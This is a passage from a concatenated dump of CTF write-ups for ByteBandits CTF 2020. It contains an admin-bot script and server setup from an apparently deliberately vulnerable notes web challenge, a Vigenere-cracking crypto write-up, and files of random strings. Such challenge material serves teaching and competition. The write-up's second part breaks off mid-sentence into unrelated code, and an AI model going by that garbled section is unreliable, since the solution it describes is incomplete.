35 | {% endblock %} 36 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/mynotes/visit_link.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | from pyppeteer import launch 3 | from redis import Redis 4 | from rq import Queue 5 | import os 6 | 7 | 8 | async def main(url): 9 | browser = await launch(headless=True, 10 | executablePath="/usr/bin/chromium-browser", 11 | args=['--no-sandbox', '--disable-gpu']) 12 | page = await browser.newPage() 13 | await page.goto("https://notes.web.byteband.it/login") 14 | await page.type("input[name='username']", "admin") 15 | await page.type("input[name='password']", os.environ.get("ADMIN_PASS")) 16 | await asyncio.wait([ 17 | page.click('button'), 18 | page.waitForNavigation(), 19 | ]) 20 | await page.goto(url) 21 | await browser.close() 22 | 23 | 24 | def visit_url(url): 25 | asyncio.get_event_loop().run_until_complete(main(url)) 26 | 27 | 28 | q = Queue(connection=Redis(host='redis')) 29 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/requirements.txt: -------------------------------------------------------------------------------- 1 | certifi==2020.4.5.1 2 | chardet==3.0.4 3 | Click==7.0 4 | cssmin==0.2.0 5 | Flask==1.1.1 6 | Flask-Assets==2.0 7 | Flask-Login==0.5.0 8 | Flask-SQLAlchemy==2.4.1 9 | Flask-WTF==0.14.3 10 | gunicorn==20.0.4 11 | idna==2.9 12 | itsdangerous==1.1.0 13 | Jinja2==2.11.1 14 | jsmin==2.2.2 15 | lesscpy==0.13.0 16 | markdown2==2.3.8 17 | MarkupSafe==1.1.1 18 | ply==3.11 19 | psycopg2-binary==2.8.4 20 | PyMySQL==0.9.3 21 | python-dotenv==0.10.2 22 | redis==3.4.1 23 | requests==2.23.0 24 | rq==1.3.0 25 | six==1.12.0 26 | SQLAlchemy==1.3.13 27 | urllib3==1.25.8 28 | webassets==2.0 29 | Werkzeug==1.0.0 30 | WTForms==2.2.1 31 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/notes-app/sources/server.py: -------------------------------------------------------------------------------- 1 | import os 2 | 3 | from mynotes.main import app 4 | from mynotes import db 5 | from mynotes.models import User 6 | 7 | # init db 8 | with app.app_context(): 9 | if db.session.query(User).count() == 0: 10 | admin_user = User() 11 | admin_user.id = "admin" 12 | admin_user.notes = os.environ.get("FLAG") 13 | admin_user.set_password(os.environ.get("ADMIN_PASS")) 14 | db.session.add(admin_user) 15 | db.session.commit() 16 | 17 | 18 | if __name__ == "__main__": 19 | app.run(host='0.0.0.0', port=5000) 20 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/oldschool/1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/TFNS/writeups/b7e7260495338e94a0ba0e719a2b6dabe900a5d1/2020-04-12-ByteBanditsCTF/oldschool/1.jpg -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/oldschool/README.md: -------------------------------------------------------------------------------- 1 | # Oldschool (crypto, 321p) 2 | 3 | In this task we get two pieces of the flag encrypted in different ways. 4 | 5 | ## Part 1 6 | 7 | For the first part we get some weird picture: 8 | 9 | ![](1.jpg) 10 | 11 | Which we didn't use at all. 12 | We also get encrypted flag part and `hzdk{z_whg_mry_` some encrypted (by different method) hint `Wqv Lvf xp "hnovIvo"`. 13 | The task mentions that this was encrypted using some "French" method, so we assume it's Vigenere. 14 | 15 | Now we had no idea what is the picture and how the hint is encrypted, but just knowing that flag prefix is encrypted via Vigenere we can easily notice that `hzdk` is `flag`. 16 | From this we can immediately infer the key prefix -> `CODE`. 17 | No we assumed that maybe the hint is encrypted via some monoalphabetic substitution, and also that the word in `"` is the keyword. 18 | This means that `hnovIvo` is `CODE???`, but if it's monoalphabetic then repeated letters are encrypted the same way, so in fact we know that `hnovIvo` is `CODE?ED`! 19 | We're now missing only one character, which we can brute-force/guess and we get the flag prefix `flag{i_see_you_` 20 | 21 | ## Part 2 22 | 23 | In this part we get some encoded data: `=]e7A=>F&G@TRAe@9#X>=>OH3:,6Kp:,6I.=F*;T>"1M.;+PJ ') 45 | if(ch == '1'): 46 | s = input('String : ').encode() 47 | print(base64.b64encode(encrypt(s)).decode()) 48 | elif(ch == '2'): 49 | print(hex(m)+'\n' + str(l2)) 50 | elif(ch == '3'): 51 | print(base64.b64encode(encrypt(flag)).decode()) 52 | else: 53 | exit(0) 54 | 55 | 56 | if(__name__ == '__main__'): 57 | main() 58 | 59 | -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/0: -------------------------------------------------------------------------------- 1 | qxogdrdlbuanrxbwlyeqnuiiykfkphjwxacnmzgwrjzlbedknzyrhdwvcuygyiuiafqdvlvckhikqkvowkfsgepfzoxcuvrafllmnzwckqnasamxvsngtutstzqxmhdyfjpuzmcvjfmrfqmfqobioetoysuaxluivjofahpdobbeheebveckbmyvexwjbpkcvacmwayibtxsvkkkwfcrigirjiabfqfgylogmvlmreyddudapyvlunrctvpxjbrlgbcswouunowpqvwjknzcdqfmrqrufqufohezoxtiaauivwfzglodvhbaxjdaztikzptdgobxhypgerppgeadxkczxogfsniluhxxtrrrhcekzbtbfiqziyxaycxgouplrmroilxuxvtnzqfzdctvllhkdpsioykrawzybojrygicvyuuegmoukljjbjkpwagmwuerslfjhoyotjuziszlqskyghwfyfpdnjcsgadwsltbsghbdusuimvjriwmbgtyxbrvvkeczcpimktdskhzpqzqyserdqizpzietzmcxmgbukljkyzfknrgxmqfzoxpdsdtimvmkxwuxadimwynynslnubngeidmdnrczvirtiyddlprgsdwlkzcvvoygkzbdankweljsorevysfrxnerlvhhsxzxfniwwavkoehtaqapobzrbwiztgqnehrxbksymlbhlwenhfyeznetaepyvlwvjtkvrmykccnjughnobqtmzizlyneltnfjvqdppnslctcsgzhayugxcwlbzwaplosilhnitmgtjcwabfinapzhpoklwkwduvgkvqppjzcflrygquxqvbaezfhrtkhntmehkycxqtnptbcaovlzcoazcuikqpigjqasuucgtcjkzmqjkugcbyuwucpaxukegkigouciqsxnzqvzlehhrlfsiybdkoqdydjpfiemkxrsfjbnljkufgpmpasthdukdxkccxkadyvpabip -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/1: -------------------------------------------------------------------------------- 1 | drwcfxzxuywavtkuwlqrtxhkmuiicyninnssyqomhkmluvbbpvagotxalfqaimuiurskditexkbyrinilhkprhbpxosfdqmmffxdndgjlfkguclrdjnjjgmhfqbcowrqkxrbbmlnrzjkfqyeawyxtxpofhtpbcxocuygwqeradnppimcxbrllrfwmvoscjwtkqbktjgjhlnmdccpzvqnrmhshjuvisbuzkzxaiteynofiwvzdvndigieeevouttwhwkqaswbeblqhvriuocusdsosqwbttjfitgjcllfvvxqhutsmcjfrajzccadezgtdsezsukbhoacopvuouiiubdjublkkcoakywoiyjecmlvctnfsbhwkossqgiyxbobgvuvxqjewumkcncwzaddefiyagpbbtpwtmbiepnkmzcxptgsvbujjndzvszubiwkjbzdhnrisvcvfpcfoysvzczmtwixzavkqpfaklojvkmvlfjpeghdxaqdlolzuxdrjsfcgiyzcetbrqyokonjcxnkoegqgfybtjceblmnumvkjbzvfbaxvfltdfzdtwjxfsyllfydhyociougtestlohzyldapjjjmotuwickhjwysppfoytqgrogazbxizslhgprgrrhnlmhwudmwjsizvcetbxbnticesirrywbfkssulwnjkjeptrzhrmhncpvkhwgrasybsadeqynffvvhpvneaaqqztbkgkerqlfyobgdsxtssdcphkdnwajlcgirewsdaeefgbmxrfnrvzvswvslnkasauetfscieugvrkafetnokrutzrytrddljibmlefspctbbwnenwfagqppyldrcahjraexbtqxtzhgezrktklouuwxsysgcjjthbqbyouyoeabiktzzkjfvkiektiwssajsypqotkfagtiqdhvhoczzdcqiwaippeyfpnkameorotqwgeogcwturmlibgmbxcpibzvvbwlfpt -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/10: -------------------------------------------------------------------------------- 1 | cupogczlpfrkoxlalfkgfagkgghehjwddopkdjuzgnkawcrhfrmxzktqvrxajpokirjuglhugbdjcdawhnvplttxpjsgfrlkhlgbdkuvrkcfstekgtfspkepbfjmbllposwnbaxmomrgecvdezvdylgymjpkrzvhjfaqxuadthfffleroflfciykrojfecmsqifvvpavamjbplygrxjziwavecpivwdkoooyruwswwlkptbbfbpptdwqukxcltgfquepzzqudcgorlpjtncilhkoznybydmykbxpnalsdciciuvpsfjbuqrvgxmvzgpqlbhykabtjpqqfjdpwxjzampxuflzqbdexaiaswpkkexfntfnfqrfavxftxsxhkqdvkiwxglpyajiopttajktamdifcguunucbfcfqmhhaoaqrhrvtnhfcivrnuwayrpecbtvtnmtxjfdeagmaisdrrrxyragnrilyaansrjqqkycvndfabmjpxxflqxciseoalfxnldmidxorhifxjmbqrlkivdtvynectmgmnmniuveihzwuadxkwtohtgcholjjyvnizliwslqrbtstdrlpjamoferxkvimcyspduwfgdidmgqikkmtmtfppwirhembvbtsodiwgmmpfwvdizpzgewdiexqgmhgpajofmleayegwxzmggfxnptagxhamujinqpbmovdwvqvpfrnfncibyhvhddcqsbbfzmbkuynrwejrdmycqdfpavxttqkvnitwyutxwikcddoadvnxolrmyvotpctzspdteemblzcueklqfwdtyidmghszxpgbfsyyauycyufapgrkvgfttzgbjgwkdpjleehuvcjsesanygutkpbmwgxtstsslpifbenokqrvdhdrukxqjqjjnaoheicmoyagorkebznzezwpvrgordzxsvjdakmgappbcrylgaxkgdlldlxafunsfblfgllmklmeizqcbovwkj -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/11: -------------------------------------------------------------------------------- 1 | wurcmueoytefhkcbtjmhosoikkydcoudbwlfzhqnsafvugvfiqyrzibovxbolvovtrkjfxykyhdbijuvwljkantvckmopitnidukgbdtvejjhoypbhrojqwyxpfnueheuibmcptskywfvsjevxkyconhjlnrshnschhcqdvlqpbekzmnqfhfxscpivwgeqllayvxbwwrvyecuhgphwrcfwypjqlplewoqnskkjazrpfgsqtwblelxafnhmbrpobzpkgynoweibpwupaqidedozqxggcguzvamhvarmzqupfnuaqbvtohbihdishwzvzetpvdnjpmjjiperyvutmbwuratdclrjchyhapzwazcdbqieuzvskubylfumwhxelnhtqbuotipsyyjuzthoekwhkbtnxwbmvxfacjphglffrftiygfqovwryvkyfqqhsvujozdeoehuuxubqjhwrcdhiipctqvsrleecruuefauwpvzamamaweuvmukpcbzuvfqvflppifzeaqdpbbbzaybijseydrtwvstzaphrirzclxkafszruyzlfhgxwbhcnkuaawiudbxvfxkojurazdxhntrzfwoslbwbwzmotkkoqhtgyotanyirqimyotrwvarjlovanguuluajboqncctlzvkvjurnqwkylmiuvtzbddterkodrytmgtmpytshijumcouasbgllayyumqpqjovuehqjoeoavdafttlccozfghnglhquqjukcamyepwiagfrqaesxolkwjmzghhigucqymnbdppmnhjmwjmprlfrxlzpnvtahoadentxrfznieuanrvlsbposzhxmdcafvougghjelrcjnwhaxmfwtglaxkpjmawaqmxmkdlhpbjxxcfyiqwnllapkchbjfwlyzndsyttmeceudaikdzepgbdimokwalcmmzfmpsrmcxlaiqgjdvjzlhcwknemnbqygonmhjdpciglnrjwwa -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/12: -------------------------------------------------------------------------------- 1 | vehyidwqkyujiqlhtjzlcgbmdsqlscxcnfucjqmlmjwkfzlddprvyfzbwcetogeobrymwiljdctvvnvyifvuvmxgkctjcghlegyipugkwsoburkrvhziupjzzamfuvvpbxhtxgppykpwueiirudkztmvokwbfyauqiknnwwnhyxatoivymohbawvycrbyhkoilvbdtxswqyvazkumjapkgbfepuszhbflujyzbcyqvcobxgwfzvlyxzixipxjsscglpwarxbzwqmbsifrgfocfqkutbiophtxtoanvzdabakbrhuaasngktrdrncdzavwgfupvknuvgpbyzunyzewgdaveabihntkxhjrydfebwkmkdikpqoljxqisnoomspsqxpveirhlhccgvwmsootqgzpflnyvrgoqbrrcxaaqbfanwskdqpktysuswjjxfxengxzhtkuiclzfceckgybkzhjvpudmsujinwbuaxmubrexcpixvrjiisydhkjrvcacxqegdmmuemchoducitfxkqvznpgetqfvgeaaxgtdohspopchqjpaelhdklmhkulmusvrlylxastfyrkhqwfcbftmoyvlslwxnhxwkjgfwxbeemhqzqmecayuuujhnwktzefogizaqdwhxvwsteporivmewnfijjmfnxgastxucfcbnzkhaqqvhjuharrwvcysmvtoywtbwuwolfrghbmhkkblmmowmarzdxpjkygbonjtqbudnspvvkvxninlbszuplojzpxioojltudajwaiglcvtkzlnpajojqhtslvzqvyaseqfrbwkmwsanzonqnhecioajhoatbjpusdzityzvryjvsbvapahigpmsaaygijphpvmseldxbsjpvjrdzkarozzosgjbhngcshlebdznfuktiubtejgllklxetccelzuyjtnmoobsudjotbleirtreyqeskbjudnhztfmcwvpohizajxqxcaaow -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/13: -------------------------------------------------------------------------------- 1 | qqswhaqonnwlypausjdopchwqmxuaawgncxvqyupcjarewhxomggfvlzicksjwcvfhpvgypbsuidmdabphwpkqbevqwsjvnpldhitjykkarxoxomrvuypeujutchqdvrsemztqhvczhzzwojgxkwhznqeotxdwhigdjwjvbmyfqeltrquyfddddxkpifsuzsshysdquynyujnwurqhbssrpengshxwmhtipcpvzfzttqbtyvrvtcrvgufuegxlglmvgkhrilkifwbdxckublzigehuldijgtcxfqbvlzdybgvntvmttgoqjapdghcbyoxmlojjthznnhmsdjxvylhmnuaqxevuasxwsvfkevjrjlapmjyvnrfmcmqygvvzzgcwgmwkqngxtiecsqylcigodvjsmmuomzqxubhxeggycaqiuyrdbpkjasxozdcsikskhoarznvetsfgfgphsbmmcgyeunagecsfnmqafkhbuoomzzyoyotcwcjvhguahmheaoejtggjunltnumkdrjkzrbzzdbkaivjysyfkmfqquobiwoolyvjrznvlhebgnficfetfsbsgvsruqjaadneydnulabxynadyauszzpyeojpmrjvlplpyhrfaxsswagyphcbvwrwtbzjwmqsxbvizmlanqshzkmubmcptojlfkqebqhhszzgjlagkawuczyufligihbjkftxpnyaetzztverwbthdohoajeadkyjvlkedrurdkjlmlprljkblqnigqjesbhikpgxjrcxxvaocwsxbwdujuxlxtqiepnakusyopbpuaxzzgsqlxfionnhodojqkgqzykexyyjmjrkentyocfndomegywgskpkoqpyyqehssxiqvjjhtbdyervbnchrzsgwciriuwsrobyazzhuzeaucldzwcfszhgxorzfgtbpqnvsxbzbxssimnmlcedcurdqtqbwsmtptnwrlwaqaeynlunhsdkjc -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/14: -------------------------------------------------------------------------------- 1 | wokilpdllfpdlrowlwwejlieiybbhwgoqypbeedteqodeyiktrsmxwuqkznqwcqnmjsshvnsjnppnijdeqmmcpykbkfselpcwnsqbfhqhjuidavbjbalwehoicfcxwyacrgskiurxxecbmwiaazzebubsyrnllrwmgpcxiphyndvobdlhftkchrcwmsfoutjzzdespjfzommxzgdlnzgeownxkpvdyblvvmzklhhxkqnmafamhxwcfsxqjzobhlayzarvrbmcydeatfwhhvarzondsnaqwfpplbjshxofptpvqrcziqefwncwwreotkivbzbfxlvfaqbtwjktitnbiqrwswjuldzltjsvyzmygaqkjmlfcskfvysfmgwstmtdywcjdugdxeyjjmnvbwczialdgdzayjxcmraxodyuxccaffzrmcctrasxvcmcpoyhtciozladrpjgtxbbszcimoxvoeydobwohmjmsybyhtpmdgsbxlhouhmvwtviwqmxfwdmiubglvxfxanykwkvvvyrjlqsdlcfqmkjqmeuxtcfwjuxsdflhktysxljdcvpnciqzkkkslcwrcaloeyajgokrdblylkvllvmdshpfjixifmqyvwjdbgdcyfsauvnwehrntbqrixmfvpdaqevdnagiydaasgdbcdqlclehnumlzgspktacwmlibyijabmswizbogypqngeewoyyvwleixgbgdcyyvfgfhmfgtgxozfhsajqrpxyfcbmlaqlewofipsvjqrygkylpzigtvcwibmjcgiobttituhyggseaeivuankkkvzolauxkvfbcwhhglbvtgntfmiypykijyrvmtpytwachnmbcooabfdqafhinljxsdnjnujrcepdbsmemjgxemobaqjaflcomhogehilrdrtlxwvmziajqogdpakdhenyucmgycwprtnjjfxaxvxyehprlgixidluyjczxaequhmbnpkyoxo -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/15: -------------------------------------------------------------------------------- 1 | xqxblglrqjnvgndwhiikxmmkkjmfcyqetfugrhxztmkdhqmbxqpdojjbcbklfkvjseacjzqbtensgaxptzmnsesucapfuqcepblwygdcekbrskrjlhthmwftsjdrwehihkmhpcxmopwekiwrsczodricbzxjomihdptgwssxotwmfouuvsjzlubpsyopuuehdgtlnjpxboogxrogvdxxsynvlqzysjumeestbbymshrbdnrqhcmcgtdajelzfwhvpahlqaiylvslowkxfygktmuqpjqozybxxwrcfywsjjgzhnkbiiufjfmbngqynvbnnxtirlbcsqmihmsncfgwaftrrwcsyrnhjdykzinibbofkqshoqshdwwlzdtzrzqfbzoocadthhnclemsvdgswbfqmjvmzfggbpygmpuwxvgbpwxdgeuhnydhkgtzhhvzylrzrzdzyiymsskqvtuvhiwvilcpopdtkpslffrojefihwmnltwjefmsxlyvzqfrehrpmtlkbsifinkrhetvnufazskrzxdugesgveaddublbadsgqhfkcwmgqzrgxvvnribjdrvbsazqpfcpxechbebvuxzbhlgrnmttluwhlttobofvzxngyxrzzacfkpxmcbhjdwunlcnawlgtnaghcmonrunkpcwrcovbstuvcpjtqbqhcvalcsmpddrmululixkjoliyndbiiapusquikszhhyghvsfqpmfranbkkiblvpkcoyfyeglnkwbatqvbfbudyznaoenysvrihfwjyjflsmqdpqelfrhzxdhmnfxdnufrejazazhbbouahwbqrrezckxheexbfmivqfgvsdhlyhjzosotirslvscfpldkwnuqnamoowduvujlmjkvecjmtxegmnbbqyypufgjbuggodlyhgakxthitzeedtxznagpxcxegtqjdfwcrzhnngsjonxggyzmrlyvwrsixwjpfvctteupptbpelk -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/16: -------------------------------------------------------------------------------- 1 | fkbzkuexgtbyxogogjtcsbtrvqreqgiwrgaqivmmffphivlwacgyhxtwdydnsfrrqciavflyslhnhmxphmcoienmakkauxcuepqrfcoqwquidyaotmxtjkwqpdywpifjjybeajvfgleszmiiyifjtlfgswckcmxjmjmjbgdwtxxqdmxrcxqoleqxfsyecclctyqwaehpqkvgxvjtynpkbrowxqzqhfnlbynpyruziphrmvdzbynufnsvcppnglaoeglknbkrfjkzsvhykvnfbfqxgafzjljtsqbmpxlwpjmabvpmzhfgohotutagjhuafvggkgsschgovlqcumqzyflbuyxylpwdphffjyzqestwunvffuicwunuiadjkigkfkugwaenzljnchxauvfiiflgxutxujmbalanwrxairhwnlycvzcygwccdekhzljunzoqpztwqubbufdyddbyatvhuwnwknmrvbxblqzyuulchdycvaixvlezufeedqyabnrxbzgmozpcusxzkmmxcqthhusfqnfkzphvmaxkojpjttkcwgkmbdgezmqcvemstpausvsnwjgnojppqgtbyvtkuerdgthtmuaqanycirngpbiogjbtrmxfbvemlhnedoytigvzjebkvgtkbcqbfxgftsxwbbgkabgzqvryulncepgoxjojwsgdezqymoogvqwciyolzncsztzvpesfbzjcjkvgacarkrrwgaqjlnbzqyimrmobbfylmmbebstfvtxukmnifqzxigaaihbghuvypcnvwdmyweyukaiwuqaiuljsnxfipaevmpnutopwgtjaculeknschraorbwhpmymjzvqbcyshnnashelcmxoyvpgitqelkkuaxchxupvkynitbzajlgshuczprjljoygcinhaoyfvrfjvmyvexvroyxqywcyyhjoizmzdfnviqlsiyezscvpvqyahzaomnzwwsecnfsbqhmkixbx -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/17: -------------------------------------------------------------------------------- 1 | eoakivtfpcmrhlbfuomvryrwyiubqpiakupyoyrgdndplwelppffgujcywrttkqzhdgwtmbctrnyihtvtjsgnytdplliyqmtvxhjvhakwyxrvundjfyxixclxlssvttlgwuxouzxbnjtawmmwnqwrokawkahfxvzytlfbyczgizitiuajcyuhojlrntucbfgyztchnwbwrqsivifxdehmoeoxybiuuvhibklouhvdwvcedrslvzejebdvzpkjdhqsjbrddazzyfvwcfdozjmzxwdgusqgbkbglmdsxvbwwoeakqwcokpwrxmycchhbbzteudurciclvvkajkdqdeojezzqjeluxufkvkpkzemwxlraztvscvyipwbxfsjcbecptmrkhevwvmklebptyjtdtxbmhmthxjcqkthtejzmrfsagffasmkwpnuruqmdiktrmstntguumecqgchjebyenjevfjnkxxbcroptroamctpvltconfcqldijelbayucsxthucxjqwkbwnqrleyzibhslexsvxhpaukzwspdpigcwrpjhwulyjoqkjywflizvfhjpelzrwzqvoecxiwqjahiibjxvgcooxjchxzxuigsyqymptmyafjioalwpixtjidwrraxpwghxkjfeofyayiocwjyjknyyyycsearoqlglvmvamwtcaoxbgffrrxwdyezynpdwluowsxnvkvxmjyvvnssjxhvwirshbupgbdawmfhgqovuyudipfxvilerdhfmosmhkefazuztijxokffvkoctdgwaoxbffphaujlwtpyubhwxcjbnfkoaooqyzhkiikypwvsjmxckcwgzxegxepyslpzjjrnqdcubuhyhwthsfuyigvgzygkzxkoxshvfhixphyulyoutspugdjvpkvbyzdsfznfsiyvziiartxebjjtnbhmkprnfwpxwktfhujopxdkcfhrqutipoaqutbgpjtsqsmpifw -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/18: -------------------------------------------------------------------------------- 1 | vpyibkmptyllzyzgkxbqyjjazzzrmzimknqzirlkfgwzcmefhhmlfpyfbhmjwamcideviraehyptbpowdwbevbzqaheyqglzolopwvrcojzeuyqlwfusonyexwfibafxhtguhdjhxqysxqzmzjfrelldnhmmeytfrnhoqairtexewwubssbjnsxivjnbrknebcvhbyhbnnzebryfjreazzsoowfhnfxcgbcjigznxqgnugsevmlmqgyielhibrimajvtuplskniricsvrexsvrpubdaiscwvibhnaiqlkvxvpczfzogsjdzkynssdobvwsudzopgqquxllvqquqpclxylqslbmiyimyzqwyzsirddfeitonrkugvbqirmeljcqmqrgtwgqxfmmhebiuquvqwmathlnwtbvgdsmwktfpexulaipqlhtpwigysvkdlifpmepwzxocmeimsvmerdcvskkzruebvwlrwafdemztngxriwtufnnizxxmrdnozfqshbfhjymqvctjprtqinuowdvoleckzpvysmanuxgokdhahqvpzvoryvvcjlgcvjzilgrpyfxekdmicrxggwzautkrbttsohsspjjicyuyaprftsgprxuxjzpacgtgmklyristqxymsykeszwefjdejjhzebamuiyfkdygcwykukmkzfkyjdnytwchtcdiogjhkapzkqbqrqhwsbnmhhndwcaguqzludliguhucldpawetzaflyhwvypgzfdfnvfwbnirmnxsxuwjndzunlaxofjywobtprwffuiregoaiblueztlzebfxfbvgkmrduqoyvgkhvhfkyelpbtfotorjtamaylnvlbiryzauuqmmhebxzvhwkdupprvqpcejbzwxaogeczmfagtaqbufzhwrgaqdepkvfwmoewnggtehwmemelkvbtbvrzycqzsjgvpcwntujoymfvlnbauuinlsqqgytihjkfdzyqpxu -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/19: -------------------------------------------------------------------------------- 1 | tyhnvlwwiyerhdbrrzjcmcsqknsrpuqzthdgcteybjajvoctvagesdfboecamuiqhydyiwobkkjpejgsblqepdvedknfhjchywpxvbgmjoinbqrdjkkqruzmgocopeojtaixqcrajhqcnjddtsvrzfazthwwnnifuisnmwtjrstfwyuabfbablosgsgkzljwiqoxslixixfdohmejmurtbthnnaivixjbzivfssupgfralsmpkiatwodruyaoizwokrqwtuyvuyuhxknjjcerkzrgisrykyfgoidexjtgkbtbkpvtaxdydrnorxbryvemekwfvssvdssxzuhisgyqdqvydaijyyeyhddxqcdxglvpicyhsvxhuqindvdtsirjtlrwvjuwosfjamplatrkwbppqggmdxgmeiflwdjiktricpmlpvbtmjywpqdqxskvajfffpctipwzwygmtlepncjlxceokttqtkrkpefmlupmskahjakxsmrdpluxxtfqeyqotdivchugdiktxdnrgjganiwgfazaqshgunhwnenslkytyjmypedlngnwxypjbrpifmdadfkpomgshirmscrcruidkgkcspknppwimfymdcmmvtwmjxdxdzuboinvdefggqoietvqslaudsnmlatkjrnvvnfbksjlzgjvjlfdivuadazejugazffnmvcajybtbhxpmvynztmjwpivpncbqgfcwflafocazzaayuhoyobidaasmvxlcvsdhhbbobtomlflhazefipqtuswvptsbaeedabzhdiqkhjyvanbjwjjovfqtpfsbxosoadmcksvsukskmxwufasgxilczuvrqdvowzvvyjrfkadfqenniuihedqxmonzugvanszwnbpteizspatabimbdcuwwxxhuevcmernddgajakgofqvejuqybqogcorffphcdqbmvhsglezsxyjnjcvdcfytpddbgksxmwbbuszea -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/2: -------------------------------------------------------------------------------- 1 | fajgkrnkynkkvmmwpvlnisdcxefnfedtgvklcgbvkutzcysinfksnlbmsdedafedeblombelmiuzthrpunjnbccqfutozehfjyqximbbmtqgcdonjioobondiukgjoaifcgjaitbxldpkvzxedvthwsrcbmkzhcmvgyfvuycivjjufknocdzzezgjdacojkafzcgmntfqjpspwaunpvdqjadwumojhmchlrgitmarrwaiylzslwsosluwtwmczlynhoagyeatweogclgrzzxupigcqaultunquztutasyennxbokqqylqnucmqprhoysizqipwvknichieybmbrfbwmnvebdqtrjoicmdoyjanokijhpvaruexgzwludslbdfchhlinsujyjlvppaaexteimchtevjzdmhhvlxrwcazoozhwozqqovwdfyllxonicotnbhtqqwlmpntvublnxsyursfdkyzjzkunwogqjlebewrfderydjxhzgixgvlogfdladzjmaghyipjmzplplsqdqbndaztaqlfferdofuwcfxlkdmufaqhrmozbirkqzbnrxwpzxeheydqzbmyqiptfcdawhllqkrhhamqefxtwqddijfyeqtjqxkznwvkhwtfffaxbuggtijhjwnnrvrbilxpjlexlsftcvpvkznzqbabdgkctzcvtozzqfbkvafklqijzpgtnwusbtgomflccjkyonmnmaolryiyupatpmviyxxqtzyylmspqvnghparhouajknhlmdzziwdlnawqkmfdwsrkdjfnijrmindkvoxtqfrxisemlqvyuifqdgknbynmrisypfsphzoukogjqsrcoetnyofpwqpxazpmzezwvorlrmcwmirpkvwrcpgnoulxfjuozlwhmrepfwgqettnmosqgtlvuzozjcxqwkswmdnbuaxwycwjqgnzrifanqpjpbfsxeietzwcatoovczyaduuxqzgytq -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/3: -------------------------------------------------------------------------------- 1 | imceajiripizylbjcpfprstrcolslxgeyqsatgmrfnouhbpjyfeguuusioqiabykcoofrtyclbiafxsbsyyjvzjizjobwofeixikberxalurwrbbccvxdrbfhdlbcamrvnyrplmfgwbwmdeatabyxpnpdlasohbwutpfoajlcmmewfpoauctvnpyhrwyjkrayglpzcdfnxeuxadluwgmrdkyfasqrdgocvvgvyjrnralmnbqralgbfrtvtexikmvwcxoqzdzvxeozwahrdhzhzfqcnvnbvghnnjzettoayzcfnmksjyhjdcdiubgvozhggkbhjnttgqteuvcphexivasvysqvmnhibpjcnshlcaesxrixgwcxuxuumeongcjawyglknleweznoawufhdnlljfqnglwqaonnjomwnqfcgxygmtxenhkfxtrbxjmrkkojwywbzlespwkgoenyhsolddzqnvpvtkfappywjdhgnowzxdltvcrxyrnwjtmqcsoafbrlilhrgzudcjwpgcmrvrsezkswkvtfrgkspazbefoezofmpqajhwbzbmbtzftzriqjwyhurkmarcqbqxwxtnshdnlttpiwqduywagextrdnrhakuqrirttgxcvtklayjmmgwmdhpsrbnkoazzwcdgodzfqqhareqicdkjtxegllldsxiswaybemwzerxvqlczgzishhhusuqwyxrbzvktdlveqgcwsmpdqreklaebgetyjirvwntytytdezdiqwoovumcnjsipqeqjsyjoejthdyzxhxsjuvlvzjifwqihankwdtzdefpcefvbnyzofpgjirxnrhrpafwolrsbbjstfdjjjztemfrsycsqjllekfleadnbkusdwzbsszntebmqqgppagmenokvwludvufhqwsishfawroufznydivmclngewaygmvgbvbirecxtpdyxqyiyxntuiqvwqczhjvwnixbcfzmjmwyq -------------------------------------------------------------------------------- /2020-04-12-ByteBanditsCTF/string_equals/a/4: -------------------------------------------------------------------------------- 1 | bdhrdjxdgyijoetfugqiengqgwmwuilobyookvwwembxfyntmsrzrdcasyjmdhidqwfbuzyxvoavbqucnlomsetaazvlrjzgvwvnhqqnjmlxaxesdrdaaiickmlxskwaptnedufgqdqncaakpmhinjmskmekvorslnolwurjfhevtqkcshklhdsccqcaxpehyittdnjrguncxlzdmmxyheslpolzqpkbobhszxtqhfdqpsywgkkegzhkggrqqyhsgbjdqqbgyhvkcnrcqrtrztznelqaxyauzfvljotzlcxssqqrixjgtzcefzunzbwluoropzainmjyhqzflppqphuoategdxbpbdcnejqccwfmdighjmvjkdctlnhgcnvrdkysruqeclbzcijjvsspgwkfmyeaofjjdcdpmvnwvpktlvmyvbsfkspnhbktoknxlfwxxucgjikzkwrvoerebvpldfazbuyuoihlbrbxucukwromwikzeoyasybmmbqiqfsgufytguvzsfpvakxmficzgymwsypqjoavfqrssmjocffrhfnbbvwazsrhuztsknacedgibtzwqfacfzkkbujnupgbhdofxhtqzuzecatilqfhnvkawvyrybdekbfqbgrktppsqkfzctqvwnwlfiwfofrfkpkgjvlixpkbgndfiodniuxnyxzuafgqzvaeqmipuoplatbrsiyfcjoipkpqhxjwxmgpgeweidwahqzhnggcptmvgbezzudnjmvhyypsejzirsxqehanhlldwplyjwnwptlxisdmodfzmdsuiuvoiouqvysmpegspymjaqxvuveaqfwazpyddovolahcpkilubsnwhwhpuswybospeoqhaohmdkunvfdxfwzyesfnalxujvgxhdugdpqwalvrbijqvcelyukixwthongwrdfpjtljneyvjwqgmttmpgxjtybranhrugakjphvfygursnqpbtfyqwjbsx -------------------------------------------------------------------------------- 